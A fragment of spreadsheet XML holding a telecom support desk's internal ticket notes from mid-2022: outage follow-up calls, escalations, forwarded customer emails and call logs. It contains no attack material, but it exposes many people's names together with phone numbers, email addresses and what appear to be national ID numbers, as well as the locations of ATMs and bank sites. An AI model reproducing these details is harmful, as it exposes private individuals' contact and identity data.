GUSTO DE SALUDARTE, SE ESCALO LA INFORMACIÓN SOLICITADA CON LA EJECUTIVA DE CUENTAS OPERADORA DE TIENDAS S:A: PARA QUE EL CLIENTE NOS PUEDA BRINDAR UN NUMERO TELEFÓNICO PARA QUE PUEDA COORDINAR EL HORARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>RE: SOLICITUD GENERAR TICKET OPERADORA DE TIENDAS S.A.
C
CHRISTIAN ANDRES ORDOÑEZ ROBLES
PARA:JONATHAN EDUARDO TEZEN MEJIA;CLIENTESCORPORATIVOS
CC:ADMIN.NMISCORPORATIVO;CNOCCA;GRUPO N1
MAR 28/06/2022 17:06
BUENA TARDE JONATHAN;
GUSTO DE SALUDARTE, SE ESCALO LA INFORMACIÓN SOLICITADA CON LA EJECUTIVA DE CUENTAS OPERADORA DE TIENDAS S:A: PARA QUE EL CLIENTE NOS PUEDA BRINDAR UN NUMERO TELEFÓNICO PARA QUE PUEDA COORDINAR EL HORARIO.
SALUDOS.
DE: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:36
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CHRISTIAN ANDRES ORDOÑEZ ROBLES &lt;CHRISTIAN.ORDONEZ@CLARO.COM.GT&gt;
CC: ADMIN.NMISCORPORATIVO &lt;ADMIN.NMISCORPORATIVO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD GENERAR TICKET OPERADORA DE TIENDAS S.A.
BUENA TARDES,
ESTIMADO CLIENTE  SU APOYO BRINANDO ACCESOS A NUESTRA AREA TECNICA
NOMBRE: MILTON DAVID MORATAYA GONZALEZ
 IBM: 650123
FAVOR BRINDAR FECHA Y HORA QUE SE PUEDE REALIZAR VISITA</t>
  </si>
  <si>
    <t>F4620607</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GOMEZ AL 54427509 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE MANTENGA EN OBSERVACION Y SE LE DE SEGUIMIENTO POR CORREO O ELLOS NOS COMUNICARAN SI VOLVIERAN A TENER ALGUN INCONVENIENTE**
-ID 2001806012
**</t>
  </si>
  <si>
    <t>F4620613</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0613
ID: 54700046T
IDENTIFICADOR DEL CLIENTE: CC_IMSA_GT_BODEGA_MYM
UBICADO EN: BODEGA M&amp;M - AVENIDA Y 41 CALLE RECINTO PORTUARIO A LA PAR DE EXPOGRANEL PUERTO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4620623</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON GERALD TORRES/CLIENTE 22437253 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4620658</t>
  </si>
  <si>
    <t>**SE LLAMA A ENCARGADO AL  32184081 CONTESTA LA SEÑORITA ELMA FUENTES INDICA QUE NO TIENE INTERNET || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001866408
**</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC/GESTIÓN N1 VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON ÁREA COMERCIAL, EL TIEMPO QUE SE DEMORA LA REPOSICIÓN DE LA SIM ES DE DOS DÍAS; AVANCES EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>F4620667</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PIMES 31136091 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001822094</t>
  </si>
  <si>
    <t>F4620706</t>
  </si>
  <si>
    <t>F4620782</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMALIA REYES AL 45707476  NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001869202
**</t>
  </si>
  <si>
    <t>SE VALIDA EN FALLA ANTERIOR ASOCIADA A LA SD
SE LLAMA A CLIENTE AMALIA 32366361 PERO ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001877297</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AMALIA 45707476 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001876730</t>
  </si>
  <si>
    <t>F4620797</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ALEX GONZALES QUIEN VA A UBICAR AL PERSONAL PARA QUE APOYE.
2001831227
COLA:
NOMBRE: A: 31195496
NÚMERO: 011 50231195496
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: +50231195496
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 28/06/2022 18:50:07</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE VASQUEZ PERO ENVIA A BUZON.
2001831150
COLA:
NOMBRE: A: 37729117
NÚMERO: 37729117
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 37729117
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 28/06/2022 18:49:18</t>
  </si>
  <si>
    <t>F4620860</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATHAN GUERRA 23049696 CONTESTA EL SEÑOR RENATO LORENZANA INDICA QUE AUN VE INESTABLE EL SERVICIO QUE SOLO UN RATO LEVANTA Y OTRA VEZ SE CAE SOLICITA QUE SE REVISE YA QUE ASI SE HA MANTENIDO DESDE AYER || SE NOTIFICA A GESTOR**
-ID 2001867072
**</t>
  </si>
  <si>
    <t>F4620880</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE CARLOS AREVALO SOLICITANDO AVANCES ID: 2001841032, SE SOLICITA APOYO A GESTOR SAMUEL.ESTRADAG VIA SKYPE| CIC ID: 2001841142 | NO SE OBTIENE RESPUESTA DE PARTE DEL GESTOR | SE ESCALA CON LIDER KEVIN FONSECA ID: 2001841256 | SE DEJA EN CONFERENCIA CON STEVE PEREZ PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4620913</t>
  </si>
  <si>
    <t>***--- CL CONSULTA AVANCES,  SE SOLICITA APOYO AL PERSONAL DE CNOC VÍA SKYPE --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 03:25
PARA: B, ASHOK &lt;ASHOK_B@BAXTER.COM&gt;
CC: SAC SOPORTE DATUM &lt;SOPORTEDATUM@CLARO.COM.EC&gt;; NOCGT@TIGO.COM.GT; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; PADRÓN, DENISSE ALEJANDRA &lt;DENISSE_PADRON@BAXTER.COM&gt;; MUTHURAMAN, PRADEEP &lt;PRADEEP_MUTHURAMAN@BAXTER.COM&gt;; SOPORTE TECNICO CORP. &lt;SOPORTETECNICOCORP@CLARO.COM.EC&gt;; PATEL, KANHA &lt;KANHA_PATEL@BAXTER.COM&gt;; GLOBAL CORP ITSM &lt;ITSM@BAXTER.COM&gt;; GLBL.GDC.NETWORKS.BNIC &lt;GLBL.GDC.NETWORKS.BNIC@BAXTER.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JIMENEZ, ENIO &lt;ENIO_JIMENEZ@BAXTER.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: [ EXTERNAL ] RE: TICKET REQUEST - BNIC || CLARO - 478800022 || GUATEMALA / RCS-PD CENTER - 31102 || INC0546992
BUENOS DÍAS ASHOK B.
                RESPECTO A SU SOLICITUD SE CONSULTA CON EL PERSONAL DEL CNOC CLARO.
ESPERAMOS COMPARTIR LOS DETALLES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: B, ASHOK [MAILTO:ASHOK_B@BAXTER.COM]
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 03:19
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; PATEL, KANHA &lt;KANHA_PATEL@BAXTER.COM&gt;; SOPORTE TECNICO CORP. &lt;SOPORTETECNICOCORP@CLARO.COM.EC&gt;; MUTHURAMAN, PRADEEP &lt;PRADEEP_MUTHURAMAN@BAXTER.COM&gt;; PADRÓN, DENISSE ALEJANDRA &lt;DENISSE_PADRON@BAXTER.COM&gt;; GLBL.GDC.NETWORKS.BNIC &lt;GLBL.GDC.NETWORKS.BNIC@BAXTER.COM&gt;; GLOBAL CORP ITSM &lt;ITSM@BAXTER.COM&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: SAC SOPORTE DATUM &lt;SOPORTEDATUM@CLARO.COM.EC&gt;; NOCGT@TIGO.COM.GT; JIMENEZ, ENIO &lt;ENIO_JIMENEZ@BAXTER.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: [ EXTERNAL ] RE: TICKET REQUEST - BNIC || CLARO - 478800022 || GUATEMALA / RCS-PD CENTER - 31102 || INC0546992
HI TEAM,
WE ARE OBSERVING CIRCUIT IS STILL DOWN. COULD YOU PLEASE PROVIDE AN UPDATE ON THE BELOW ISSUE.
THANKS &amp; REGARDS
ASHOK B</t>
  </si>
  <si>
    <t>F4620922</t>
  </si>
  <si>
    <t>NO SE HA TENIDO SEGUIMIENTO POR PARTE DE GESTIÓN N1; DEBIDO AL TIEMPO, SE ESCALA CON KEVYN FONSECA/TEAM LEADER N1, INDICA QUE NOS APOYARÁ.
CLIENTE YA ESTÁ CONSULTANDO EL FEEDBACK VÍA CORREO.</t>
  </si>
  <si>
    <t>F4621260</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE AUN NO TIENEN RESPUESTA POR PARTE DE CLIENTE FINAL
-ID 2001879017</t>
  </si>
  <si>
    <t>F4621270</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISITAN FARFAN 50002641 MENCIONA QUE REALIZARA PRUEBAS CON SUS EQUIPOS POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 2001881249 - 2001881389</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISITAN FARFAN AL 50002641 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001005230
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FARFAN AL 50002641  INDICA QUE YA SE PUEDE PROCEDER AL CIERRE DEL TICKET**
-ID 3001138973
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISITAN FARFAN AL 50002641 CONTESTA E INDICA QUE SIGUE EL INTERNET LENTO || SE NOTIFICA A GESTOR **
-ID 3001005230
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISITAN FARFAN AL 50002641 INDICA QUE ESTA DESMASIADO LENTO || SE LE SOLICITA UN MOMENTO PERO CLIENTE CORTA LLAMADA SE INTENTA NUEVAMENTE Y NO CONTESTA || SE INTENTARA LUEGO**
-ID 2001895420 - 2001896195
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISITAN FARFAN 50002641 MENCIONA QUE PERSISTE EL PROBLEMA PERO NECESITA REALIZAR PRUEBAS INTERNAS POR LO QUE SOLICITA LLAMADA EN 2 HORAS
-ID 2001903555</t>
  </si>
  <si>
    <t>F4621311</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 11:0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2167
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM21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1311
ID: 47501861T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM2167
UBICADO EN: CAJERO 2167 COMISARIA 16 CALZ. SN JUAN 1-67 Z.7 MIXCO COL. BELEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4621315</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  CARLOS ORTEGA 7842 7369 INDICA QUE NO SE ENCUENTRA EN SITIO, NOS DEJA EN ESPERA EN LO QUE UBICA UN CONTACTO EN SITIO. ID2001871536</t>
  </si>
  <si>
    <t>DURANTE LA LLAMADA CON CLIENTE  CARLOS ORTEGA 7842 7369 SE OBSERVA QUE SERVICIO RESTABLECE, SE LE HABIA SOLICITADO AL CLIENTE QUE REINICIARA SUS EQUIPOS, SE REALIZAN PRUEBAS EN CONJUNTO DE LLAMADAS ENTRANTES Y SALIENTES Y LAS LLAMADAS COMPLETAN. CLIENTE AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO
PORT STATUS                                	= NORMAL
DEVICE NAME                                	= M02_SSSASVYD_E1_ROMA_02
NAME                                       	= FRAME:0/SLOT:0/PORT:6
ALIAS                                      	= TACA_INTERN_AIRLINES_22678000
LOOPBACK STATUS                            	= NO
SIGNALING MODE                             	= CCS
CRC4 FRAME VERIFY SWITCH                   	= DISABLE
LINE CODE MODE                             	= HDB3
IMPEDANCE                                  	= 75¿
WORKING MODE FOR DIGITAL SECTION ACCESS    	= DIGITAL SECTION ACCESS
L2 MONITORING SWITCH                       	= ON</t>
  </si>
  <si>
    <t>F4621319</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SOLMER LOPEZ AL 32107325  CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA EL CIERRE DEL TICKET **
-ID 2001877291
**</t>
  </si>
  <si>
    <t>F4621324</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ROBERTO GONZÁLEZ/CLIENTE 55056377 INDICA ENLACE OK DESDE LAS 18:15 HORAS, SE LE PIDE CIERRE DEL TICKET, LO AUTORIZA.</t>
  </si>
  <si>
    <t>F4621341</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIBEL BONILLA AL 77476475 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001879902
**</t>
  </si>
  <si>
    <t>F4621387</t>
  </si>
  <si>
    <t>SE TIENE RESPPUESTA DEL CLIENTE, DONDE INDICA QUE SE TENIA EQUIPO INHIBIDO SE PROCEDIO AL REINICIO DEL EQUIPO Y EL ENLACE RESTBLECE.</t>
  </si>
  <si>
    <t>F4621392</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR SÁNCHEZ 78536155 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001980563</t>
  </si>
  <si>
    <t>F4621393</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANDRA BONILLA 70737006 MENCIONA QUE AYER PRESENTARON 2 APAGONES DE ENERGIA PERO YA APLICARON REINICIO Y NO RESTABLECE
-ID 2001891753
NOMBRE DEL CLIENTE: POLICIA NACIONAL CIVIL
UBICACIÓN:EX INGENIO SAN ESTEBAN CANTON CAMOTEPEQUE NEJAPA
CONTACTO EN SITIO:AGENTE DE TURNO
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>-SE LLAMA A CLIENTE ATEINDE AGENTE RICARDO -- CONFIRMA SERVICIO OPERATIVO</t>
  </si>
  <si>
    <t>F4621404</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE SR. SANTOS HENRIQUEZ 79896386, INFORMA QUE LA SEMANA PASADA CUANDO INSTALARON LA FIBRA OPTICA EN EL PUNTO REMOTO NO ESTA ASEGURADA SOLICITA QUE SE ENVIE PERSONAL TECNICO PARA ASEGURAR EL CABLEADO, SE AGREGA AL AUDIO A ING CHIQUILLO SOLICITA QUE CLIENTE ENVIE LAS FOTOGRAFIAS ASI APOYARA A QUE SE CUBRA GARANTIA DEL ENLACE, CLIENTE ENVIARA FOTOGRADIAS AL WAHTSAPP.</t>
  </si>
  <si>
    <t>F4621406</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 9:40
PARA: JUAN.BRAN@BANCOINMOBILIARIO.COM.GT &lt;JUAN.BRAN@BANCOINMOBILIARIO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || BANCO INMOBILIARIO, S.A. || F4621406 || 8000039T
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
HECTOR ROLANDO ALINAN PORON                     2360728700208
ALEXANDER IVAN ARRAZOLA TUN                       2319450190101
JOSE ANGEL SANDOVAL MONZON                       1796763500101
EDDY GUSTAVO ESCALANTE SOLORZANO           1981171080101
RENE CAMEROS COJON                                          2275160010101
BAYRON ALFONSO CUTZAL MORALES                  1689679870101
WILSON WILFREDO ECHEVERRIA LOPEZ              259244201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621420</t>
  </si>
  <si>
    <t>CLIENTE MARIBEL GONZALES 36889550 CONSIGUE LLAVES DEL GABINETA Y UBICA HUAWEI ONT CON ALARMA DE LOS EN ROJO, PROCEDE A REINICIAR PERO INCONVENIENTE PERSISTE. SE TIENE POSIBLE CORTE DE FIBRA. SE ABRIRÁ WO PARA LA REVISIÓN ID:2001918751</t>
  </si>
  <si>
    <t>1/4	ELMER FLORES	58260888	2 HORAS	13:03:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIBEL GONZALES 36889550 MENCIONA QUE PERSISTE EL INCONVENIETE, GESTOR MENCIONA QUE DEVOLVERA LA LLAMADA
-ID 2001896225</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE MARIBEL GONZALES 36889550 ID: 2001906008
GESTOR COMENTA VIA SKYPE QUE ESTARA DEVOLVIENDO LA LLAMADA, CL MOLESTA YA QUE ESO SE LE INDICO EN LLAMADA ANTERIOR Y AUN NO SE LE LLAMA | GESTOR INDICA QUE EN 15 MINUTOS LE DEVOLVERA | NO APLICA PC | WIP | NADA PENDIENTE DE PARTE DEL CLIENTE SINO MAS BIEN DE PARTE DEL GESTOR</t>
  </si>
  <si>
    <t>F4621423</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DE CLIENTE LUIS JUAREZ  ID: 2001901636
SE DEJA EN CONFERENCIA CON JOSE.ARIAS PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4621428</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE GREGORIA HENRIQUEZ-79956541  ##
2001891723
COLA:
NOMBRE: A: 0050379956541
NÚMERO: 0050379956541
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050379956541
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 29/06/2022 09:30:31</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GREGORIA HENRIQUEZ-79956541 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE REALIZA LLAMADA DE PRUEBA Y LA LLAMADA SI INGRESA
CLIENTE CONFIRMA EL FUNCIONAMIENTO
-ID 2001998600 - 2001999044</t>
  </si>
  <si>
    <t>F4621430</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDY VELIZ AL 35272517 DA TONO QUE EL NUMERO NO EXISTE **
ID 2001913760
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NERY PEREZ AL 41256062  INDICA QUE AUN PERSISTE EL PROBLEMA QUE EL ESTA REPORTANDO EL SERVICIO DE INTERNET || SE NOTIFICA A GESTOR **
-ID 2001914089 - 2001914362
**</t>
  </si>
  <si>
    <t>F4621453</t>
  </si>
  <si>
    <t>AÚN SE VE SEGMENTO LISTADO EN ALGUNOS SITIOS; ADICIONAL SE LLAMÓ/HABLÓ CON LUIS RODRÍGUEZ/CLIENTE 59395549 Y SE LE BRINDAN AVANCES DEL TICKET, ÉSTE INDICA QUE HIZO CAMBIOS DE DNS, HASTA EL MOMENTO TODO OK.
INDICA QUE SE PUEDE PROCEDER AL CIERRE DEL TICKET, SE INFORMA DE LO ANTERIOR A BO SEGURIDAD CLARO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4621470</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. YOGABAJ 56372635 NO CONTESTA IVR ENVIA A BUZON, ID: 2001897724.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JUANI 50623456  NO CONTESTO, IVR ENVIA A BUZON, ID: 2001897154.</t>
  </si>
  <si>
    <t>F4621474</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN CHOTO AL 71866977 CONTESTA EL SEÑOR JOSE CRUZ CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001937000
**</t>
  </si>
  <si>
    <t>F4621476</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMILCAR CARIAS  AL 59151234 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001897402
**</t>
  </si>
  <si>
    <t>F4621492</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 9:51
PARA: ROSA_SANCHEZ@BANTRAB.NET.GT &lt;ROSA_SANCHEZ@BANTRAB.NET.GT&gt;; CARLO_BORJA@BANTRAB.NET.GT &lt;CARLO_BORJA@BANTRAB.NET.GT&gt;; MONITORTI@BANTRAB.NET.GT &lt;MONITORTI@BANTRAB.NET.GT&gt;; REDESTI@BANTRAB.NET.GT &lt;REDESTI@BANTRAB.NET.GT&gt;
CC: JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL SITIO: CC_BANTRAB_GT_AGENCIA_14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1492
ID: 42700387T
IDENTIFICADOR DEL CLIENTE:CC_BANTRAB_GT_AGENCIA_144
UBICADO EN: AGENCIA SANTA CRUZ BARILLAS, 4 CALLE 4-26 ZONA 1 NIV.1 SANTA CRUZ BARILLAS HUEHUETENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CONTACTO DE LA CENTRAL: MADELYN CALDERON PERO ME INDICA QUE NO ESTA DE TURNO, ME COMPARTE CONTACTOS DE LA CENTRAL PARA CONSULTAR LA INFORMACION DESEADA.
2410-2600 EXT 10556
3001148969
COLA:
NOMBRE: A: 47390179
NÚMERO: 011 50247390179
DURACIÓN: 0:01:50
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50247390179
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 12:44:50</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA AL CONTACTO BRINDADO:  2410-2600 EXT 10556 Y AL PBX NO SE TIENE RESPUESTA, SE INTENTARA EN OTRO MOMENTO.
3001150910
COLA:
NOMBRE: A: 24102600
NÚMERO: 24102600
DURACIÓN: 0:01:00
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:DESTINO FUERA DE SERVICIO (CÓDIGO CAUSA ISDN 27)]
DETALLES: 24102600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 12:49:52
3001150291
COLA:
NOMBRE: A: 24102600
NÚMERO: 24102600
DURACIÓN: 0:01:11
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24102600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 12:48:31
3001149971
COLA:
NOMBRE: A: 24102600
NÚMERO: 24102600
DURACIÓN: 0:01:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:DESTINO FUERA DE SERVICIO (CÓDIGO CAUSA ISDN 27)]
DETALLES: 24102600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 12:47:08</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR AL NUMERO 24102600 ETX 10556 PERO NO SE TIENE RESPUESTA.
3001976444
COLA:
NOMBRE: A: 24102600
NÚMERO: 24102600
DURACIÓN: 0:01:07
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:DESTINO FUERA DE SERVICIO (CÓDIGO CAUSA ISDN 27)]
DETALLES: 24102600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 5/07/2022 16:03:21</t>
  </si>
  <si>
    <t>SE RECIBE RESPUESTA DE CLIENTE, PERSONAL DE BANTRAB INFORMA PROBLEMAS DE ENERGIA EN TODO EL MUNICIPIO, TT PERMANECE EN PENDIENTE CLIENTE
DAVID E. HERRERA (ESPECIALISTA SOC NIVEL 1) &lt;DAVID_HERRERA@BANTRAB.COM&gt;
BUENA TARDE ESTIMADO,
MUCHAS GRACIAS POR EL REPORTE, TE COMENTO QUE TENEMOS PROBLEMAS DE ENERGÍA EN TODO EL MUNICIPIO SEGÚN NOS INDICA PERSONAL DE SITIO, CUALQUIER DUDA NOS ESTAREMOS
COMUNICANDO CON USTEDES, BUENA TARDE.
SALUDOS,
DAVID E. HERRERA
ESPECIALISTA SOC NIVEL 1</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITI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1492
ID: 42700387T
IDENTIFICADOR DEL CLIENTE: CC_BANTRAB_GT_AGENCIA_144
UBICADO EN: AGENCIA SANTA CRUZ BARILLAS, 4 CALLE 4-26 ZONA 1 NIV.1 SANTA CRUZ BARILLAS HUEHUETENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LA CENTRAL, SE TIENE RESPUESTA PERO NO SE LOGRA CONTACTAR CON LA AGENCIA 144, SE LLAMARA EN OTRO MOMENTO PARA VALIDAR SI CUENTAN CON UPS ACTUALMENTE EL ENALCE ESTA OPERATIVO PERO TIENE MUCHA REINICIDENCIA.
3001977384
COLA:
NOMBRE: A: 24102600
NÚMERO: 24102600
DURACIÓN: 0:07:24
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24102600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 5/07/2022 16:11:51</t>
  </si>
  <si>
    <t>F4621502</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 11:0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1881
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM18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1502
ID: 47501935T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1881
UBICADO EN: CAJERO 1881 BANRURAL, C. PRINCIPAL BRO. SAN MIGUEL EL CENTRO EDIF, MUNICIPAL GUAZACAPAN SANTA ROSA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
